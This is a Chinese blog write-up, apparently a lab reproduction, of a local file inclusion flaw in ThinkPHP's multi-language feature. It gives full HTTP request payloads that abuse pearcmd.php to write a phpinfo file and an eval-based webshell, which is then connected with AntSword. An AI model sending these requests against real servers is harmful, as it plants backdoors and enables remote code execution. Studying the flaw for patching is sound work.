首页 > 编程语言 >ThinkPHP 多语言本地文件包含漏洞

ThinkPHP 多语言本地文件包含漏洞

时间:2023-08-29 14:24:14浏览次数:40  
标签:文件 包含 .. Accept 漏洞 本地 ThinkPHP php

ThinkPHP 多语言本地文件包含漏洞

ThinkPHP是一个再中国使用比较多的PHP框架。在其6.0.13版本及以前,存在一处本地文件包含漏洞。当多语言特性被开启时,攻击者可以使用lang参数来包含任意php文件。

虽然只能包含本地PHP文件,但在开启了register_argc_argv且安装了pcel/pear的环境下,可以包含/usr/local/lib/php/pearcmd.php并写入任意文件。

漏洞利用
首先,ThinkPHP多语言特性不是默认开启的,所以我们可以尝试包含public/index.php文件来确认文件包含漏洞是否存在:
img

如果漏洞存在,则服务器会出错,返回500页面。
文件包含漏洞存在的情况下还需要服务器满足以下两个条件才能利用:

  1. PHP环境开启了register_argc_argv
  2. PHP环境安装了pcel/pear

Docker默认的PHP环境恰好满足这两个条件,所以我们可以直接使用下面这个数据包来写shell.php文件

GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+shell.php HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Cache-Control: max-age=0

如果服务器返回peaecmd的命令执行结果,说明漏洞利用成功:
img

此时访问/shell.php即可发现已经成功写入文件:
img

或者写入一句话木马

GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=@eval($_POST['hack'])?>+hack.php HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Cache-Control: max-age=0

使用蚁剑连接
img

标签:文件,包含,..,Accept,漏洞,本地,ThinkPHP,php
From: https://www.cnblogs.com/kalixcn/p/17664606.html

相关文章

  • 如何使用本地电脑搭建一个属于自己的网站
    本地电脑搭建Web服务器并用cpolar发布至公网访问@[TOC]前言随着互联网的快速发展,网络也成为我们生活中不可缺少的必要条件,为了能在互联网世界中有自己的一片天地,建立一个属于自己的网页就成为很多人的选择。但互联网行业作为资本密集的行业,委托别人建立一个像样的网站要花费不少,不......
  • 网神SecGate 3600防火墙obj_app_upfile任意文件上传漏洞
    漏洞简介网神SecGate3600防火墙obj_app_upfile接口存在任意文件上传漏洞,攻击者通过构造特殊请求包即可获取服务器权限影响范围网神SecGate3600防火墙漏洞复现fofa语法:fid="1Lh1LHi6yfkhiO83I59AYg=="登录页面如下:POC:POST/?g=obj_app_upfileHTTP/1.1Host:jg.zhon......
  • ThinkPHP5 SQL注入漏洞 && 敏感信息泄露
    ThinkPHP5SQL注入漏洞&&敏感信息泄露启动后,访问http://10.10.10.154/index.php?ids[]=1&ids[]=2,即可看到用户名被显示了出来,说明环境运行成功。漏洞利用访问http://10.10.10.154/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1,信息成功被爆出:当然,这是一个比较鸡......
  • 漏洞名词扫盲(转载)
    作者:Michael链接:https://www.zhihu.com/question/37413342/answer/2972231175来源:知乎POC、EXP、Payload与ShellcodePOC:全称'ProofofConcept',中文'概念验证',常指一段漏洞证明的代码。EXP:全称'Exploit',中文'利用',指利用系统漏洞进行攻击的动作。Payload:中文......
  • 大华智慧园区综合管理平台 video 任意文件上传漏洞
    漏洞描述大华智慧园区综合管理平台video接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限漏洞复现fofa语句:"/WPMS/asset/lib/gridster/"或app="dahua-智慧园区综合管理平台"鹰图语句:web.body="/WPMS/asset/lib/gridster/"登录页面如下:P......
  • 大华智慧园区综合管理平台searchJson SQL注⼊漏洞
    漏洞简介大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。由于该平台未对用户输入数据做限制,攻击者可以直接将恶意代码拼接进SQL查询语句中,导致系统出......
  • 大华智慧园区综合管理平台 user_getUserInfoByUserName.action 账号密码泄漏漏洞
    漏洞简介大华智慧园区综合管理平台user_getUserInfoByUserName.action中存在API接口,导致管理园账号密码泄漏漏洞复现fofa语句:"/WPMS/asset/lib/gridster/"或app="dahua-智慧园区综合管理平台"鹰图语句:web.body="/WPMS/asset/lib/gridster/"POC:/admin/user_getUserInfoBy......
  • 大华智慧园区综合管理平台devicePoint_addImgIco任意文件上传漏洞
    漏洞简介大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格......
  • 5.1.29 远程代码执行漏洞
    ThinkPHP55.0.22/5.1.29远程代码执行漏洞漏洞描述Thinkphp是一个国内轻量级的开发框架。由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。验证方式直接访问http://your-ip:8080/index.php?s=/Index/\thi......
  • 命令执行漏洞(未完)
    前言:正在学习命令执行漏洞,故记录一下1.1什么是命令执行定义:用户输入的数据被当作系统命令执行比如windows下的cmd和linux下的bash1.2为什么会造成命令执行漏洞1代码层过滤不严格,没有过滤system等函数2系统的漏洞造成命令注入3调用的第三方组件存在代码执行漏洞1.3......